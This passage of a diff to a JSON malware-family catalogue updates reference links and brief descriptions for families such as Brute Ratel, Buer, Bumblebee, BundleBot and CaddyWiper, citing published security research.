"https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/", - "https://web.archive.org/web/20230216110153/https://yoroi.company/research/hunting-cyber-evil-ratels-from-the-targeted-attacks-to-the-widespread-usage-of-brute-ratel/", - "https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/", "https://www.youtube.com/watch?v=a7W6rhkpVSM", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://twitter.com/embee_research/status/1580030303950995456?s=20&t=0vfXnrCXaVSX-P-hiSrFwA", + "https://0xdarkvortex.dev/hiding-in-plainsight/", "https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities", - "https://blog.spookysec.net/analyzing-brc4-badgers/", - "https://socradar.io/brute-ratel-utilized-by-threat-actors-in-new-ransomware-operations/", "https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/", - "https://www.splunk.com/en_us/blog/security/deliver-a-strike-by-reversing-a-badger-brute-ratel-detection-and-analysis.html" + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf", + "https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/", + "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", + "https://socradar.io/brute-ratel-utilized-by-threat-actors-in-new-ransomware-operations/", + "https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/", + "https://blog.spookysec.net/analyzing-brc4-badgers/", + "https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/", + "https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb", + "https://web.archive.org/web/20230216110153/https://yoroi.company/research/hunting-cyber-evil-ratels-from-the-targeted-attacks-to-the-widespread-usage-of-brute-ratel/", + "https://twitter.com/MichalKoczwara/status/1652067563545800705", + "https://protectedmo.de/brute.html" ], "synonyms": [ "BruteRatel" @@ -16575,10 +17371,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", - "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://www.secureworks.com/research/threat-profiles/bronze-palace", - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" ], "synonyms": [], "type": [] @@ -16618,38 +17414,38 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer", + "https://twitter.com/StopMalvertisin/status/1182505434231398401", + "https://www.trendmicro.com/en_us/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns.html", + "https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/", + "https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96", + "https://tehtris.com/en/blog/buer-loader-analysis-a-rusted-malware-program", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", - "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware", - "https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader", + "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "http://www.secureworks.com/research/threat-profiles/gold-blackburn", + "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/", + "http://www.secureworks.com/research/threat-profiles/gold-symphony", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust", + "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "http://www.secureworks.com/research/threat-profiles/gold-symphony", - "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", - "https://twitter.com/StopMalvertisin/status/1182505434231398401", - "https://blog.minerva-labs.com/stopping-buerloader", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns/TechnicalBrief-An-Analysis-of-Buer-Loader.pdf", "https://blog.group-ib.com/prometheus-tds", - "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/", - "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace", - "https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://www.trendmicro.com/en_us/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns.html", "https://twitter.com/SophosLabs/status/1321844306970251265", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", - "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://blog.minerva-labs.com/stopping-buerloader", "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust", - "http://www.secureworks.com/research/threat-profiles/gold-blackburn", + "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://tehtris.com/en/blog/buer-loader-analysis-a-rusted-malware-program", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/" + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader", + "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns/TechnicalBrief-An-Analysis-of-Buer-Loader.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html" ], "synonyms": [ "Buerloader", @@ -16665,8 +17461,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buffetline", - "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", - "https://www.us-cert.gov/ncas/analysis-reports/ar20-045f" + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045f", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/" ], "synonyms": [], "type": [] @@ -16675,7 +17471,7 @@ "value": "BUFFETLINE" }, { - "description": "", + "description": "According to Elastic, BUGHATCH is an in-memory implant loaded by an obfuscated PowerShell script that decodes and executes an embedded shellcode blob in its allocated memory space using common Windows APIs (VirtualAlloc, CreateThread, WaitForSingleObject).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bughatch", @@ -16692,18 +17488,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", - "https://malware-research.org/carbanak-source-code-leaked/", - "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/", - "https://www.scythe.io/library/threatthursday-buhtrap", - "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/", - "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", - "https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/", + "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/", - "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code", + "https://malware-research.org/carbanak-source-code-leaked/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", - "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" + "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", + "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/", + "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code", + "https://www.scythe.io/library/threatthursday-buhtrap", + "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/", + "https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/" ], "synonyms": [ "Ratopak" @@ -16718,60 +17514,66 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee", - "https://www.deepinstinct.com/blog/the-dark-side-of-bumblebee-malware-loader", - "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/", - "https://www.youtube.com/watch?v=pIXl79IPkLI", - "https://www.youtube.com/watch?v=JoKJNfLAc0Y", "https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-replaces-contis-bazarloader-in-cyberattacks/", - "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/", - "https://blog.krakz.fr/articles/bumblebee/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", - "https://www.aspirets.com/blog/bumblebee-malware-loader-threat-analysis/", - "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056", - "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/", - "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", - "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/", - "https://blog.cerbero.io/?p=2617", - "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest", - "https://threathunt.blog/bzz-bzz-bumblebee-loader", - "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/", - "https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/", - "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/", - "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/", - "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/", - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/bumblebee-docusign-campaign", - "https://cloudsek.com/technical-analysis-of-bumblebee-malware-loader/", - "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control", - "https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664", - "https://twitter.com/threatinsight/status/1648330456364883968", - "https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://community.riskiq.com/article/0b211905/description", - "https://blog.sekoia.io/bumblebee-a-new-trendy-loader-for-initial-access-brokers/", - "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns", - "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", - "https://www.infinitumit.com.tr/bumblebee-loader-malware-analysis/", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://blog.talosintelligence.com/following-the-lnk-metadata-trail", "https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads", - "https://isc.sans.edu/diary/28636", - "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return", - "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", + "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/", + "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest", "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/", + "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control", + "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", + "https://blog.sekoia.io/bumblebee-a-new-trendy-loader-for-initial-access-brokers/", + "https://blog.talosintelligence.com/following-the-lnk-metadata-trail", + "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/", + "https://www.infinitumit.com.tr/bumblebee-loader-malware-analysis/", + "https://community.riskiq.com/article/0b211905/description", "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/", - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks", - "https://research.openanalysis.net/bumblebee/malware/loader/unpacking/2022/05/12/bumblebee_loader.html", - "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti", - "https://isc.sans.edu/diary/rss/28636", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", "https://isc.sans.edu/diary/rss/28664", - "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g", + "https://www.youtube.com/watch?v=JoKJNfLAc0Y", + "https://blog.cerbero.io/?p=2617", + "https://www.botconf.eu/wp-content/uploads/formidable/2/2023_4889_DESOUZA.pdf", + "https://0xtoxin.github.io/malware%20analysis/Bumblebee-DocuSign-Campaign/", + "https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks", + "https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return", "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/", "https://twitter.com/ESETresearch/status/1577963080096555008", - "https://www.logpoint.com/wp-content/uploads/2022/05/buzz-of-the-bumblebee-a-new-malicious-loader-threat-report-no-3.pdf" + "https://isc.sans.edu/diary/rss/28636", + "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/", + "https://twitter.com/threatinsight/status/1648330456364883968", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g", + "https://blog.krakz.fr/articles/bumblebee/", + "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/", + "https://www.aspirets.com/blog/bumblebee-malware-loader-threat-analysis/", + "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", + "https://threathunt.blog/bzz-bzz-bumblebee-loader", + "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056", + "https://www.logpoint.com/wp-content/uploads/2022/05/buzz-of-the-bumblebee-a-new-malicious-loader-threat-report-no-3.pdf", + "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/", + "https://cloudsek.com/technical-analysis-of-bumblebee-malware-loader/", + "https://twitter.com/Intrinsec/status/1699779830294970856", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid", + "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/", + "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/bumblebee-docusign-campaign", + "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns", + "https://www.deepinstinct.com/blog/the-dark-side-of-bumblebee-malware-loader", + "https://isc.sans.edu/diary/28636", + "https://research.openanalysis.net/bumblebee/malware/loader/unpacking/2022/05/12/bumblebee_loader.html", + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/", + "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", + "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx", + "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti", + "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/", + "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", + "https://www.youtube.com/watch?v=pIXl79IPkLI", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [ "COLDTRAIN", @@ -16788,8 +17590,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", - "https://www.f-secure.com/weblog/archives/00002249.html", - "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf" + "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf", + "https://www.f-secure.com/weblog/archives/00002249.html" ], "synonyms": [ "0zapftis", @@ -16800,18 +17602,31 @@ "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", "value": "Bundestrojaner" }, + { + "description": "Bundlebot is an info stealer that abuses the single-file dotnet bundle which operates as a self-contained executable that does not require any preinstalled dotnet runtime version. Bundlebot functionality targets a wide variety of data including the victim's system information, browser data, telegram data, discord token, Facebook account information, and screenshots. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundlebot", + "https://research.checkpoint.com/2023/byos-bundle-your-own-stealer/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d63eb20b-6a3f-4d96-a52d-8395f1868389", + "value": "BundleBot" + }, { "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/", - "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/", - "http://malware-traffic-analysis.net/2017/05/09/index.html", "https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/", - "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/" + "http://malware-traffic-analysis.net/2017/05/09/index.html", + "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/", + "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/", + "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/" ], "synonyms": [], "type": [] @@ -16854,13 +17669,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", - "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", - "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", - "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/", "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", + "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/", - "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/" + "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia", + "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" ], "synonyms": [], "type": [] @@ -16897,46 +17712,47 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper", - "https://www.nioguard.com/2022/03/analysis-of-caddywiper.html", - "https://twitter.com/silascutler/status/1513870210398363651", - "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", - "https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html", - "https://n0p.me/2022/03/2022-03-26-caddywiper/", + "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/", "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", - "https://cybersecuritynews.com/destructive-data-wiper-malware/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", - "https://cert.gov.ua/article/39518", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine", - "https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html", - "https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/", - "https://cert.gov.ua/article/3718487", + "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://twitter.com/ESETresearch/status/1503436420886712321", + "https://www.nioguard.com/2022/03/analysis-of-caddywiper.html", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", "https://securityaffairs.co/wordpress/129069/cyber-warfare-2/caddywiper-wiper-hits-ukraine.html", - "https://www.truesec.com/hub/blog/analysis-of-caddywiper-wiper-targeting-ukraine", + "https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html", "https://twitter.com/HackPatch/status/1503538555611607042", - "https://cybernews.com/cyber-war/new-destructive-wiper-malware-deployed-in-ukraine/", - "https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/", - "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", + "https://twitter.com/silascutler/status/1513870210398363651", "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-caddywiper", + "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/", + "https://cybernews.com/cyber-war/new-destructive-wiper-malware-deployed-in-ukraine/", + "https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html", + "https://www.mandiant.com/resources/blog/gru-rise-telegram-minions", + "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", + "https://cert.gov.ua/article/3718487", + "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/", + "https://www.mandiant.com/resources/blog/gru-disruptive-playbook", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://www.truesec.com/hub/blog/analysis-of-caddywiper-wiper-targeting-ukraine", + "https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/", + "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", - "https://twitter.com/ESETresearch/status/1503436420886712321", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://www.splunk.com/en_us/blog/security/threat-update-caddywiper.html", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/", - "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/", + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", + "https://n0p.me/2022/03/2022-03-26-caddywiper/", "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", - "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", - "https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/", - "https://www.mandiant.com/resources/blog/gru-rise-telegram-minions", + "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/", + "https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/", + "https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine", + "https://cybersecuritynews.com/destructive-data-wiper-malware/", "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/", - "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/" + "https://www.splunk.com/en_us/blog/security/threat-update-caddywiper.html", + "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/", + "https://cert.gov.ua/article/39518", + "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/" ], "synonyms": [ "KillDisk.NCX" @@ -16951,8 +17767,8 @@ "meta": { "refs": [ 